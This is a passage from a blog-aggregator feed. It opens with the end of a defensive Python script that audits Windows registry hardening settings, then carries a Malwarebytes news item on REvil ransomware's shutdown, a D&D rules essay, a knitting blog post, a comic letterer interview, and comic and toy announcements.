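        cur = observed.get(setting_id(s))
        if cur is None:
            status = "unset"   # OS default applies; set it explicitly (GPO/registry)
        elif cur in s.hardened:
            status = "ok"
        else:
            status = "weak"
        rows.append({"check": s.name, "value": s.value, "current": cur,
                     "hardened": s.hardened, "status": status})
    return rows


def read_local_registry() -> Dict[str, Optional[int]]:
    """Read the checked values from this host (Windows only, uses winreg)."""
    import winreg
    observed: Dict[str, Optional[int]] = {}
    for s in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, s.key) as k:
                data, _kind = winreg.QueryValueEx(k, s.value)
                observed[setting_id(s)] = int(data)
        except FileNotFoundError:  # key or value does not exist
            observed[setting_id(s)] = None
    return observed


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows host you want to audit")
    for row in evaluate(read_local_registry()):
        print(f"[{row['status']:>5}] {row['check']}: {row['value']}={row['current']}")
```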

Bad things happen

If, despite your best efforts, a ransomware incident occurs at your organization, CISA, the FBI, and NSA say US-based organizations should:

Stay safe, everyone!

The post Protect yourself from BlackMatter ransomware: Advice issued appeared first on Malwarebytes Labs.

Categories: Techie Feeds

REvil ransomware disappears after Tor services hijacked

Malwarebytes - Tue, 10/19/2021 - 13:42

Some pests you hope will never recover from a blow, and this is one of them. It’s almost too good to be true, but one can hope. The REvil ransomware group has shut down its operation for the second time this year after losing control over its Tor-based domains.

Shutdown number 1

REvil’s first shutdown was in July 2021, after the gang successfully pulled off a supply chain attack against Managed Service Provider Kaseya. Shortly after this widespread incident all online traces of the gang weirdly seemed to vanish from the internet. In particular, the payment sites and data leak site were taken offline, along with the infrastructure for victims to make Bitcoin payments and get the decryption tools.

A lot of speculation ensued but there were no definite answers. Some said the group had joined forces with the DarkSide group to come back stronger under the name BlackMatter. Others claimed a victory for the good guys, hoping, almost against the odds, that some of the countermeasures taken by governments across the globe were starting to produce results. The Kaseya attack certainly had such an impact worldwide that it brought the full attention of international law enforcement to the group.

The group’s own story is that one of the group’s leaders took down the servers and disappeared with the group’s money, which left them unable to pay many of their affiliates.

The comeback

Unfortunately, a few months later, the REvil ransomware gang made a comeback, attacking new victims and publishing stolen files on a data leak site. The Tor payment and negotiation sites suddenly turned back on as well, with the timers for all prior victims reset to the day the infrastructure went offline.

Shutdown number 2

This time the shutdown looks to be the result of a hostile takeover. This week, the gang’s Tor payment portal and data leak blog were allegedly hijacked, and a spokesperson for the group said the server was compromised. The threat actor’s post on an underground forum said the group’s Tor services were hijacked and replaced to point to a different location.

And again, speculation comes into play.

Allegedly, many affiliates were still waiting to be compensated for the losses they suffered when the group last disappeared. On top of that, there are rumors that the developers of the ransomware hid a backdoor in their code, so that they can forgo their affiliates and provide decryption keys directly to victims.

This doesn’t really make sense, in my view. But it is possible that a key exists that can decrypt the files of multiple, or maybe even all, victims. It wouldn’t be the first time.

Either way, cybercriminals that operate under covert identities rely on a strong base of trust if they want to continue to work together. And that trust in REvil seems to be at a low level, and may be totally gone depending on how this disappearing act turns out.

torrc file

In all the reports about the server takeover there is a mention of the torrc file. This is a text file that holds the configuration details for a Tor instance. The spokesperson for REvil claimed that the path to their hidden service was deleted and the attacker raised their own, hoping that visitors would go there. Basically, the hidden service entry in the torrc file is what points visitors to an .onion site at the correct web server. Being able to alter that file requires a high level of access.

So, who do you think is responsible? Let us know in the comments. I have prepared a few choices, but obviously you can add your own options.

Option 1: An angry affiliate that has had enough.

Option 2: It was an inside job and yet another admin fled the scene with the money.

Option 3: Law enforcement shut down the operation and is now after the people behind it.

Option 4: A white hat hacker that wishes to remain anonymous for safety’s sake.

Option 5: It was just a glitch and they will be back next week, maybe under another name.

Option 6: It was the former group’s leader who was not amused to learn about the comeback.

Wink if you are not guessing, but know for a fact.

The post REvil ransomware disappears after Tor services hijacked appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tasha’s Rules for Custom Origins Make Pencil-Necked Mountain Dwarves Overly Good

DM David - Tue, 10/19/2021 - 12:17

I played Rime of the Frostmaiden in a party that included the sort of armored dwarven wizard empowered by two features: (1) a weak dwarf’s ability to wear stout armor without a speed penalty and (2) the customized origins from Tasha’s Cauldron of Everything, which let players assign their race’s ability score bonuses to any ability score. This dwarf started with a Strength of 8 and level of fighter for heavy armor proficiency, but some characters gain similar benefits by opting for a mountain dwarf and gaining proficiency with medium armor.

We both played wizards who boasted similar offensive power, except his wizard never got hit. When the character returned at high levels for my D&D weekend, a shield spell routinely boosted his AC into the 30s.

Aside from a monk with high Wisdom and Stunning Strike, I suspect the character type that dungeon masters find most tiresome combines high AC and the ability to cast shield. We DMs can be fans of the characters and still want to land an occasional attack. I love Superman, but I also love the threat of a robot powered by a kryptonite heart.

Tasha’s custom origins improve D&D by giving players freedom to play the character they want without choosing ability scores that make the character less effective than others. In an appearance on Dragon Talk, lead D&D designer Jeremy Crawford says, “All games are about making choices and making meaningful choices, but we want the choices to be between things that are all fun and interesting. What we don’t want is a choice where just hiding inside it is some kind of trap. And that’s what the traditional ability score bonuses often feel like to people.

“As the game continues to evolve, and also as the different types of characters people make proliferate and become wonderfully diverse, it’s time for a bit more of those old assumptions to, if not pass away, to be something that a person can set aside if it’s not of interest for them and their character.” The Tasha’s rules create a game that helps gamers imagine and create a broader spectrum of viable characters. “You can play the dwarf you want to play. You can play the elf you want to play. You can play the halfling you want to play.”

Does the new freedom fuel more powerful characters? Jeremy says no. “Contrary to what many people might think, those ability score increases that are in those different options, they are not there for game balance purposes. They are there strictly to reinforce the different archetypes that have been in D&D going back all the way to the 70s.”

The game’s design gives smaller ability score bonuses to races with more potent racial features. Jeremy contends that where players put the ability score bonuses doesn’t matter.

Except the placement matters. Before custom origins, mountain dwarves gained +2 Strength along with medium armor proficiency—a feature that rarely benefits characters who gain from +2 Strength. Fighters and paladins get armor proficiency anyway; barbarians and monks avoid armor. For wizards and other classes that actually need armor, that +2 Strength offers nothing. To the Player’s Handbook designers, this combination of Strength and armor proficiency seemed like such useless fluff that mountain dwarves gained +2 in two ability scores rather than just one. Besides, Strength is a roleplaying choice for sub-optimal characters.

I suspect that if Jeremy failed to save against a suggestion that forced the whole story, he would admit that the placement of modifiers does matter, but not enough to derail adding the simple and flexible custom origins in Tasha’s. Mountain dwarves rank as strong, but not overpowered.

Still, if the designers gained a redo on the dwarf, surely the race’s mechanics would change. In the case of dwarves, the custom origin rules go beyond enabling unique characters who defy class archetypes. The rules encourage pencil-necked dwarf wizards able to wear half-plate. I’ve learned to accept characters who sell out to seldom get hit, but acceptance comes easier when the price isn’t a bargain. Nonetheless, if I were king of D&D, custom origins and their flexibility would stay despite the adventuring parties suddenly filled with clanking dwarven wizards.

Categories: Tabletop Gaming Blogs

Just do it

Yarn Harlot - Mon, 10/18/2021 - 22:39

Lately, I have taken to working occasionally from what’s become my “upstairs office” which is – well. It’s my bed. In the first autumn of the pandemic something in me snapped and for the life of me I suddenly couldn’t figure out why Joe and I were sleeping on a tiny crappy mattress that was more than twenty years old. The thing was second hand when it was new to us, and it was way, way past its best before date. It was too small too – when Elliot was with us it just meant he kicked us all night, and I guess I’d really come to hate that bed a lot, but somehow back when we travelled a lot I got breaks from it and didn’t mind it so much. Cue the lockdown(s) and suddenly it became the focus of everything that was wrong in the world. Everything. Covid? No, I can handle that. Living in the city with the longest lockdown in the world? No, I am not upset about that in the least. Being separated from my loved ones, friends and career and yarn stores? No, none of that is a problem, it was just the STUPID BED.

I finally ordered a new one, sight unseen. I had a conversation with a nice lady named Dory at a bed store and I just bought what she suggested, which was some hybrid blah blah, king size, and I had her ship it here. A friend asked if it wasn’t kind of strange to buy a bed without even lying in it first, but all the shops were closed on account of the lockdown, I’d snapped and – as I told the friend, the great thing about sleeping in a really, really terrible bed for a really, really long time is that truthfully, any bed that Dory sent over here was going to be such an upgrade it didn’t matter much. Before the bed came, I scrubbed every inch of the bedroom, repainted, got new curtains, new sheets, and a new duvet. I even bought a lamp. It was time and I love it. The bed, the room, the everything. Our bedroom is one of the brightest rooms in the whole house, and with Joe still working from home it’s often one of the quietest, and now that my entire life is lived in stretchy pants and wool slippers, it makes total sense to have a bed-office. (It also doesn’t help that I’ve filled my actual office with the setup for filming the Patreon. At least up here I don’t have to worry about knocking over the weird card-table-tripod setup I’ve got going on down there.)

So, here I sit, with an awesome cup of tea (recently have become addicted to Monarch Tea Company’s Cream Earl Grey) and I’ve brought up my knitting, and as soon as I’m done writing this I am definitely not working on this sock until I have finished Ken’s sweater.

Yarn is the precious and heartbreakingly discontinued Dream in Color Everlasting in Victoria. (Dream in Color still makes great yarn, just not this one.) The pattern is Verbena Socks. It’s great fun, and I’m even enjoying the colour, and you can write that down somewhere – that I was grooving on a purple yarn, because knitters, it is most definitely not my favourite colour. I wonder if it’s partly because for some terrible reason, I have developed an aversion to knitting on Ken’s sweater, for no good reason, I might add. I love the yarn, it’s a good pattern and I’m so close to finishing it should be all I want to work on. I think I’ve only got about 12 more rows of brioche to do on the back of the thing and then all it needs is a bath and a bit of assembly and a neckband.

This, I think we can all agree – is not much. Yea verily it is very little, and I can’t tell you why every single time I pick it up it just seems like a slog. I’ll knit two rows and then find myself thinking things like “Goodness me, I shouldn’t be knitting this! Look at that sock. It’s far more urgent” and then off I go to knit… well, anything else, really. It makes no sense, but has been good for getting other things done around here, because it turns out I’d rather do anything at all than finish this – even clean. Somehow, I’ve put it on the list of things I will do immediately once everything else is done and naturally everything else is never going to be done, especially if I keep starting things, which I am absolutely doing.

So, here it stops, today. I’m not knitting anything else until this is in the bath. If nothing else, it’s started glaring at me, and I can feel it looking at me with judgement. Once inanimate objects start taking on a personality it’s past time to get them out the door.

This ends today, sweater.

Categories: Knitting Feeds

RICH INTERVIEWS: Nathan Kempf Curator/Letterer for Adventures Everywhere: A Comic-Book Anthology for Kids

First Comics News - Mon, 10/18/2021 - 22:20

Rich: How did you get into Lettering comic books?

Nathan: Honestly, it was a “right place, right time” kind of situation. My partner and I went to a local comic-book shop here in France where Mateus Santolouco (TMNT) was signing some books. There, I met the people taking care of localizing comic-books (translating and adapting the lettering) for the French market, and I asked if they had a place for me, to which they answered “yes”. I worked for them for around two years as a localizing letterer, and then had the ambition of working on original stories instead of just localizing them and worked my way up from there. I now letter full-time.

Rich: What one of your published works stands out the most for you?

Nathan: When it comes to French books, I had the chance to work on a 60-issue series telling the entire history of my country, L’Histoire de France en Bande Dessinée, published by Hachette Collection. It was talked about on TV, in newspapers, … and it allowed people to learn about this subject in a more accessible way, so I’m very proud to have worked on it.

When it comes to American comic-books, it would be Deadbox, published by Vault. I started lettering US comic-books in early 2020, so getting to work for such a popular publisher after so little time, and on an amazing story like this one, feels unreal to me. I also got to letter this series through AndWorld Design. The founder, Deron Bennett, is a letterer I truly look up to, so working through his studio is incredible.

Rich: Why use an anthology format?

Nathan: I feel like the anthology format fits perfectly with a child’s attention span. On a more serious note, all kids will not relate to the same stories, which is normal, so it felt weird for me to release one story and just be satisfied with it. The anthology format also allows for creators from different backgrounds to come and tell a story they want to tell, and for more kids to be able to relate to this book. It’s important, especially in these times when the future is as unpredictable as ever. Going for an anthology format just felt right.

Rich: What is the theme throughout the anthology and why?

Nathan: Throughout this book, I wanted to show kids that anything can be an adventure (hence the name Adventures Everywhere). Whether you are trying to find an amazing place to eat dessert, moving to the other side of the country, or finding out who you really are, you will be put in a position of learning, growth, self-discovery, doubts, and so much more. I believe it is important to show kids it’s normal to go through those cycles, and that it may take time for them to discover who they want to be and carve their own path. In that way, life is an adventure, and I hope it will give hope to the kids reading this anthology.

Rich: Will this anthology inspire children and children of all ages?

Nathan: I truly believe so. We have stories for everyone: a fire-breathing hamster saving turtles, a child finding the perfect gift for their newborn sibling, the experience of a disabled teenager going to their first pride parade. Most issues faced by today’s youth are showcased in this book, so I’m convinced they will all be able to relate to the stories, find comfort in them, and also find inspiration.

Rich: Who are Jes & Cin and why are they important to “Adventures Everywhere: A Comic-Book Anthology for Kids”?

Nathan: JesnCin (short for Jessica and Jacinta Wibowo) are Indonesian identical twins who write and illustrate their own stories, such as LUNAR BOY under Harper Alley in 2023, and they are the ones who illustrated the cover for the anthology. A cover is so important, because it is the first thing people will see when looking at a book, and I feel like they did the job perfectly. Communication with them was easy and we got on the same foot quickly, which shows in the final product. Them being driven by creating empowering stories for younger readers was a huge bonus. Finding a cover artist was a very long process for me, but I couldn’t be any happier with the result.

Rich: How did you go about getting others involved in the making of “Adventures Everywhere: A Comic-Book Anthology for Kids”?

Nathan: Honestly, just an open call on Twitter. I have no prior experience in curating an anthology and I’m not well known in the comic-book world, so I was honestly not expecting people to answer the call, but it seemed like the easiest way for me to reach other creators. I ended up with hundreds of submissions and a lot to review, but it gave me the chance to find the stories and artists I truly believed in the most.

Rich: Who are a few of the talented people involved with this anthology?

Nathan: I’m lucky to have amazing creators working on this anthology! We have a foreword by Stephanie Cooke (Oh my Gods!), and stories by people such as Shadia Amin (Spider-Ham: Great Power, No Responsibility), Jordan Alsaqa (Raise Hell!), Brittany Matter (Into the Sunset), Quade Reed, and so many more.

Rich: How did you find the job of Curator challenging?

Nathan: The hardest part was reviewing and selecting stories. I think I went through 6 rounds of trimming down until I had a satisfying number of stories left. Curating the anthology was challenging as a whole, but I think it is mostly due to it being my first time. If there is a next time, I know the entire process will be easier; I’ve already learned a lot about what I could have done better.

I’m also very lucky to have experienced people helping me on the backend before the anthology launches (Brittany Matter helped me a lot setting up the Kickstarter campaign page, and James Emmett is taking care of PR, which is a huge relief).

Rich: After this anthology what will you be working on next?

Nathan: I will be lettering, mostly. I have also written a mini-series called The Gaia Theory, that I am currently pitching to publishers. If it doesn’t work, it will go to Kickstarter early in 2022.

I am also working on two kids’ graphic novels, Ahoy! and The Road of the Dandelions, whenever I have the time, hoping to have them out there in the next few years.

Also, if this anthology’s campaign is a success, I already know the theme of the next one (and yes, it will still be for kids).

Rich: What other comics would you recommend?

Nathan: Oh, that’s a tough one! Lately, I’ve been binge reading (again) Saga and Locke & Key, they’re amazing stories that I could read repeatedly. I’m also a big fan of Tom Taylor’s Nightwing and Superman: Son of Kal-El.

When it comes to middle-grade / young-adult books, the Marvel stories published by Scholastic are truly great (Miles Morales: Shock Wave, Spider-Ham: Great Power, No Responsibility, …). Actually, comic-book wise, I feel like kids can’t go wrong with Scholastic’s books.

Rich: Why use Kickstarter and what is the URL for this one?

Nathan: Kickstarter is a great way for projects like this anthology to actually see the light of day. Between paying creators, printing costs, and all the different expenses, such a book can very easily cost more than $10K to create. Funding it through Kickstarter is an amazing way to connect with fans and peers, while making sure there will be people to support the book when it’s out there.

You can find the campaign at

Rich: Why do you love comic books?

Nathan: This medium is truly amazing, I feel like it has the best parts of all other storytelling mediums. It’s kind of like a novel, but you’re not limited to words to tell your story. Your visual storytelling is also not limited by a budget like movies can be. To me, comic-books are the absolute best way to tell compelling stories and have them easily available to everyone. I mean, just look at how popular Webtoon is, and how many people are creating stories for this platform only.

Rich: Any words for the fans who support this anthology?

Nathan: Thank you, from everyone involved. Your support matters so, so much, and we couldn’t make this project without you. If the campaign succeeds, I cannot wait to have all your feedback, and I hope you will enjoy reading it as much as we enjoy creating it.

Categories: Comic Book Blogs

DC Fandome DC Reveals: Direct Statues and THE BATMAN MOVIE Action Figures!

First Comics News - Mon, 10/18/2021 - 22:13

Check out McFarlane Toys reveals from DC Fandome!

DC FanDome 2021 raised the bar and revealed for the FIRST TIME EVER spectacular NEW McFarlane Toys DC Direct Statues!

Plus the launch of the first wave of THE BATMAN Movie Action Figure collection!

Legendary Comic Artist and McFarlane Toys CEO Todd McFarlane shared new details about McFarlane Toys’ recently announced partnership with DC Direct to create new DC collectibles and revealed the FIRST LOOK at the McFarlane Toys DC Direct lines!

In 2022, McFarlane Toys will start releasing BRAND NEW DC statues and figures, including:

  • The first-ever The Batman Movie statues of BATMAN and THE RIDDLER, in time for its theatrical release.
  • A new statue, Joker: Purple Craze, based on superstar artist Greg Capullo’s The Joker from Batman: Death in the Family.
  • Continuation of the incredibly popular Batman Black & White line with a stunning statue by Mike Mignola that offers a unique companion piece to the other Black and White statues.
  • McFarlane Toys The BATMAN Movie DC Multiverse action figures featuring Batman, Catwoman, The Riddler and the Batcycle. All figures sold separately.

You can NOW pre-order some of our VERY FIRST figures from The Batman movie DC Multiverse line and PRE-ORDER the FOUR DC Direct Statues revealed during DC Fandome!

Categories: Comic Book Blogs


First Comics News - Mon, 10/18/2021 - 22:09

Creators George Mann and Aleta Vidal Explore the End of The World in New Graphic Novel MOTHERBRIDGE

MILWAUKIE, Ore. (October 19, 2021) – Dark Horse Comics is pleased to announce a new original graphic novel that explores motherhood and myth in the dystopian fantasy MOTHERBRIDGE: Seeds of Change. This new, emotionally rich epic from Sunday Times bestselling creator of Newbury & Hobbes George Mann and rising artist Aleta Vidal arrives May 2022.


In the aftermath of a failed utopia, an exiled woman fights to be reunited with her children by harnessing the mythic power that changed the planet forever.


Twenty years ago, the World Mother awoke, forming an enormous “worldbridge” from manmade ruins and knotted vegetation that spanned the globe. Borders fell, millions migrated, and legendary creatures returned to the forests. But recently, the World Mother has gone silent, and the worldbridge has begun to wither. Borders are being reinstated. Now, one woman, cast out by her adoptive nation, must assemble a team of outcasts to reawaken the World Mother and bring down the wall separating her from her family.


“Motherbridge is a story very close to my heart, and one that’s been bubbling away in my subconscious for many years. In some ways it’s a reaction to the global difficulties we’re all living through at the moment—climate change, species extinction, isolationist politics—but it’s also very much a story of hope and love. At its heart, this is a tale about family, both biological and found, and about how even the smallest acts of compassion can change the world for the better. It’s been a joy to work on this book with Aleta and watch her bring Hayley and her world to stunning, vivid life.” – George Mann


“It took a second from when I received the proposal to work on this project until I accepted it; I felt it was for me from minute one. This story is a tribute to diversity and love for our world, with a family finding each other in the middle and enlarging it along the way. This is a great love story. Working on things that I believe in, teaming up with people who share those beliefs like George, gives me the strength to carry them out. I’ve drawn from the soul every line.” – Aleta Vidal


MOTHERBRIDGE: Seeds of Change arrives in comic shops May 18, 2022 and bookstores May 31, 2022 and is available for pre-order now through Amazon, Barnes and Noble, and your local comic shop for $19.99.

Categories: Comic Book Blogs


First Comics News - Mon, 10/18/2021 - 22:07

Title: ANT # 1
Publisher: Image Comics
Story/Art/Color: Erik Larsen
Flats: Mike Toris
Letters: Jack Morelli
Hardworking Farm Boy: Josh Eichhorn
Based in part on the work of: Mario Gully
ANT created by: Mario Gully
Price: $ 3.99 US
Rating: 4 out of 5 stars
Website: www.imagecomics.com
Comments: The villains ANT faces are Randy Dandy, Pussyfoot, Yuck-It-Up, Quizmaster, and Half-Black, and ANT is an action-packed hero diving into these villains. Hannah, a young girl, is shown drawing ANT’s adventure. The villains she imagines are what you might expect from a young girl.
Hannah’s life growing up is a hard one. Her dad is busy with work, her mother is not in her life, and a bully is harassing her. Then things get really bad. As ANT is born in blood and death, she is not someone you ever want to mess with.
The art showing ANT posing as an ant is stunning. This origin is one amazing story wonderfully told.
This new series of ANT does make use of parts from the previous ones and improves on them. Hannah is starting her career as a super-hero and she has the right attitude. She is strong willed, and while she used to be weak of body, not any more. Her new antennae are a deadly weapon. This new improved Hannah is ANT, and evil had better run.
The costume design makes use of black to highlight the costume, which does fit Hannah like a second skin. The visuals of it make it and ANT jump out at you.
ANT is a hero for those who need one.

Categories: Comic Book Blogs